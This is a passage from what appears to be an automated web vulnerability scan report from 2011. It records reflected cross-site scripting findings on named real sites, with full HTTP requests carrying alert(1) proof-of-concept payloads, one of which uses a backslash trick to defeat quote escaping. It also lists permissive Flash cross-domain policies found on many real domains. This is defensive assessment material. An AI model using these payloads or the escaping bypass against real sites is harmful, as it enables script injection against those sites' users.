<META NAME="CONTRIBUTORS"
...[SNIP]...
<li>24c54<script>alert(1)</script>508ccbd11b05bf3ba is an invalid e-mail address.</li>
...[SNIP]...

3.29. http://www.redskye911.com/e911_information_center/default.aspx [_TSM_HiddenField_ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.redskye911.com
Path:	/e911_information_center/default.aspx

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a54f5\'%3balert(1)//7b4e3c0ecf3 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as a54f5\\';alert(1)//7b4e3c0ecf3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /e911_information_center/default.aspx?_TSM_HiddenField_=ctl00_pageWebinarInfoForm_ctl00_HiddenFielda54f5\'%3balert(1)//7b4e3c0ecf3&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d3.0.31106.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3a79be4cda-496c-4ec3-9619-b4d32086b3b9%3ade1feab2%3af9cec9bc%3a35576c48 HTTP/1.1
Host: www.redskye911.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_information_center/
Cookie: ASP.NET_SessionId=1bw3xe552lbj2j551tb0bb55; kilo_boat_cid=911078775; tz=5; __utma=112137735.110952242.1305162418.1305162418.1305162418.1; __utmb=112137735.2.10.1305162418; __utmc=112137735; __utmz=112137735.1305162418.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=a449df2-12fe1be4def-5e2048d0-1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:09:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Fri, 11 May 2012 01:09:32 GMT
Last-Modified: Thu, 20 Jan 2011 20:17:09 GMT
Content-Type: application/x-javascript
Content-Length: 47738

//START Common.Common.js
(function(){var scriptName="ExtendedCommon";function execute(){var u="WatermarkChanged",t="HTML",s="BODY",r="hiddenInputToUpdateATBuffer_CommonToolkitScripts",q="HTMLEvents",
...[SNIP]...
)();
//END TextboxWatermark.TextboxWatermark.js
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {$get('ctl00_pageWebinarInfoForm_ctl00_HiddenFielda54f5\\';alert(1)//7b4e3c0ecf3').value += ';;AjaxControlToolkit, Version=3.0.31106.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-US:79be4cda-496c-4ec3-9619-b4d32086b3b9:de1feab2:f9cec9bc:35576c48';Sys.Application.remove_lo
...[SNIP]...

3.30. http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://connectedplanetonline.com
Path:	/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d3cb"-alert(1)-"6b2f9ae4ade was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/ HTTP/1.1
Host: connectedplanetonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=8d3cb"-alert(1)-"6b2f9ae4ade

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:02 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Content-Type: text/html
Content-Length: 53341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
s-0422/index.html" //doc uri
s.prop9="By Joan Engebretson" // byline
s.prop10="Apr 22, 2011 12:42 PM"
status="200"
if (status == "404")
{
s.referrer="http://www.google.com/search?hl=en&q=8d3cb"-alert(1)-"6b2f9ae4ade"
s.pageType="errorPage"
s.pageName=location.href

}
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.31. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 8c930<script>alert(1)</script>3871f157ceb was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.redskye911.com%2Fe911_products%2F&jsref=http%3A%2F%2Fwww.redskye911.com%2F&rnd=1305162438995 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==8c930<script>alert(1)</script>3871f157ceb

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Thu, 12 May 2011 01:07:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==8c930<script>alert(1)</script>3871f157ceb
userid:
</div>
...[SNIP]...

4. Flash cross-domain policy previous next
There are 30 instances of this issue:

http://ad.doubleclick.net/crossdomain.xml
http://altfarm.mediaplex.com/crossdomain.xml
http://api.facebook.com/crossdomain.xml
http://b.scorecardresearch.com/crossdomain.xml
http://by.optimost.com/crossdomain.xml
http://fls.doubleclick.net/crossdomain.xml
http://img.mediaplex.com/crossdomain.xml
http://metrics.connectedplanetonline.com/crossdomain.xml
http://metrics.sprint.com/crossdomain.xml
http://metrics.vonage.com/crossdomain.xml
http://now.eloqua.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://api.demandbase.com/crossdomain.xml
http://api.tweetmeme.com/crossdomain.xml
http://cdn.stumble-upon.com/crossdomain.xml
http://feeds.bbci.co.uk/crossdomain.xml
http://googleads.g.doubleclick.net/crossdomain.xml
http://nanpa.org/crossdomain.xml
http://newsrss.bbc.co.uk/crossdomain.xml
http://support.sprint.com/crossdomain.xml
http://w.sharethis.com/crossdomain.xml
http://www.awltovhc.com/crossdomain.xml
http://www.dslreports.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.nanpa.org/crossdomain.xml
http://www.stumbleupon.com/crossdomain.xml
http://anpisolutions.app4.hubspot.com/crossdomain.xml
http://i.dslr.net/crossdomain.xml
http://twitter.com/crossdomain.xml
http://www.vonage.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Thu, 12 May 2011 00:47:35 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.2. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Thu, 12 May 2011 00:47:55 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.3. http://api.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 11 Jun 2011 00:48:12 GMT
X-FB-Server: 10.42.55.43
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

4.4. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 01:07:20 GMT
Date: Thu, 12 May 2011 01:07:20 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.5. http://by.optimost.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://by.optimost.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: by.optimost.com

Response

HTTP/1.0 200 OK
Server: Fast
Content-Type: text/xml
Content-Length: 200
Accept-Ranges: bytes
Last-Modified: Thu, 30 Sep 2010 23:09:18 GMT
Expires: Thu, 12 May 2011 00:50:36 GMT
Pragma: no-cache
Date: Thu, 12 May 2011 00:50:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.6. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Wed, 11 May 2011 02:38:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 79921
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.7. http://img.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:48:00 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.8. http://metrics.connectedplanetonline.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.connectedplanetonline.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.connectedplanetonline.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:47:47 GMT
Server: Omniture DC/2.0.0
xserver: www80
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.9. http://metrics.sprint.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:32 GMT
Server: Omniture DC/2.0.0
xserver: www62
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.10. http://metrics.vonage.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.vonage.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.vonage.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:42 GMT
Server: Omniture DC/2.0.0
xserver: www27
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.11. http://now.eloqua.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Thu, 12 May 2011 00:46:53 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

4.12. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 00:48:44 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 12 May 2011 00:48:44 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.13. http://api.demandbase.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.demandbase.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.demandbase.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 May 2011 00:46:49 GMT
ETag: "248c48f-113-4a13e63e774c0"
Last-Modified: Tue, 19 Apr 2011 05:00:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 275
Connection: Close

<cross-domain-policy>
<allow-access-from domain="*.demandbase.com" to-ports="80,443" secure="false" />
<allow-access-from domain="*.fireraven.com" to-ports="80,443" secure="false" />
<site-contr
...[SNIP]...

4.14. http://api.tweetmeme.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 12 May 2011 00:48:11 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Thu, 12 May 2011 00:48:56 +0000 GMT
Etag: ffad005467e43bdd2b8b4291a00ba33b
X-Served-By: h01

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

4.15. http://cdn.stumble-upon.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cdn.stumble-upon.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:32 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 00:48:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

4.16. http://feeds.bbci.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Server: Apache
Content-Type: text/xml
Cache-Control: max-age=27
Expires: Thu, 12 May 2011 00:09:12 GMT
Date: Thu, 12 May 2011 00:08:45 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.17. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 11 May 2011 19:48:38 GMT
Expires: Thu, 12 May 2011 19:48:38 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 17841

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.18. http://nanpa.org/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://nanpa.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: nanpa.org

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
Last-Modified: Fri, 03 Apr 2009 17:47:04 GMT
ETag: "b42233-e2-466aa22f81600"
Accept-Ranges: bytes
Content-Length: 226
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.resourcenter.net" />
...[SNIP]...

4.19. http://newsrss.bbc.co.uk/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://newsrss.bbc.co.uk
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=101
Expires: Thu, 12 May 2011 00:10:25 GMT
Date: Thu, 12 May 2011 00:08:44 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.20. http://support.sprint.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://support.sprint.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

